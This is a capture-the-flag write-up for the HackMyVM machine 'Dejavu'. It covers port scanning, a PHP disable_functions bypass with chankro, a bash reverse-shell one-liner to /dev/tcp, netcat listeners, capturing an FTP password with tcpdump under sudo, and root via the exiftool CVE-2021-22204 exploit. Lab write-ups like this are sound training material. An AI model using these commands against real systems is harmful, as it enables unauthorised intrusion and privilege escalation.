NOTES ABOUT Dejavu

[ 2022-10-22 ] [ HackMyVM / Dejavu ]

Status: Rooted
Skills: Port Scanning, Fuzzing, Upload Bypass, PHP Disabled Functions Bypass, Reverse Shell, Exiftool Exploit,
Tools: nmap, ssh, gobuster, chankro, nc, exiftool, tcpdump

PORT SCANNING

$ nmap -T4 -sCSV -p- 10.0.2.14

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:8f:5b:43:62:a1:5b:41:6d:7b:6e:55:27:bd:e1:67 (RSA)
|   256 10:17:d6:76:95:d0:9c:cc:ad:6f:20:7d:33:4a:27:4c (ECDSA)
|_  256 12:72:23:de:ef:28:28:9e:e0:12:ae:5f:37:2e:ee:25 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)

GETTING IN

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u 10.0.2.14
/index.html           (Status: 200) [Size: 10918]
/info.php             (Status: 200) [Size: 69920]
/server-status        (Status: 403) [Size: 274]  

$ curl 10.0.2.14/info.php
<html>
<body>
<!-- /S3cR3t -->
</body>
</html>
[...]

http://10.0.2.14/info.php - HUM?

+--------------------+--------------------------------------------------------+
| disable_functions  | system,exec,passthru,shell_exec,proc_open,             |
|                    | proc_get_status,proc_terminate,proc_close,virtual,     |
|                    | popen,show_source,curl_multi_exec,pcntl_alarm,         |
|                    | pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited    |
|                    | pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued, |
|                    | pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,       |
|                    | pcntl_signal,pcntl_signal_get_handler,                 |
|                    | pcntl_signal_dispatch,pcntl_get_last_error,            |
|                    | pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,    |
|                    | pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,       |
|                    | pcntl_setpriority,pcntl_async_signals,pcntl_unshare    |
+--------------------+--------------------------------------------------------+

[ how-i-bypassed-disable-functions-in-php-to-get-a-remote-shell ]

[ https://github.com/kriss-u/chankro-py3 ]

$ git clone https://github.com/kriss-u/chankro-py3.git
$ cd chankro-py3
$ cat rev.sh
bash -c 'bash -i >& /dev/tcp/10.0.2.15/80 0>&1'
$ python3 chankro.py --arch 64 --input rev.sh --output shell.phtml --path /var/www/html

$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.14] 60406
bash: cannot set terminal process group (758): Inappropriate ioctl for device
bash: no job control in this shell
<nMostCriticalInternetSecurityThreats/S3cR3t/files$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

ELEVATING PRIVILEGES

<nMostCriticalInternetSecurityThreats/S3cR3t/files$ sudo -l
sudo -l
Matching Defaults entries for www-data on dejavu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on dejavu:
    (robert) NOPASSWD: /usr/sbin/tcpdump

LOCAL PORT SCAN WITH NC

nc -zv 127.0.0.1 1-65365 2>&1 | grep suc
Connection to 127.0.0.1 21 port [tcp/ftp] succeeded!
Connection to 127.0.0.1 22 port [tcp/ssh] succeeded!
Connection to 127.0.0.1 80 port [tcp/http] succeeded!

LISTENING FTP COMUNICATION WITH TCPDUMP

www-data@dejavu:/$ tcpdump -i lo port ftp

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
[...]
FTP: 220 (vsFTPd 3.0.3)
FTP: USER robert
FTP: 331 Please specify the password.
FTP: PASS ********************
FTP: 230 Login successful.
FTP: QUIT
FTP: 221 Goodbye.
[..]

$ ssh robert@10.0.2.14
robert@10.0.2.14\'s password: 
[...]
robert@dejavu:~$ cat user.txt 
HMV{********************}

EXIFTOOL EXPLOIT

$ wget https://raw.githubusercontent.com/convisolabs/CVE-2021-22204-exiftool/master/exploit.py -O CVE-2021-22204-exiftool.py
$ python3 ./CVE-2021-22204-exiftool.py


$ cat ./CVE-2021-22204-exiftool.py 
#!/bin/env python3

import base64
import subprocess

ip = '10.0.2.15'
port = '80'
[...]

$ scp exploit.djvu robert@10.0.2.14:/home/robert
$ nc -lvnp 80

#RUN EXPLOIT
robert@dejavu:~$ sudo -u root exiftool ./exploit.djvu

connect to [10.0.2.15] from (UNKNOWN) [10.0.2.14] 60142
# id
uid=0(root) gid=0(root) groups=0(root)

# cat root.txt
HMV{********************}

# init 0

--- Loaded 373 times ---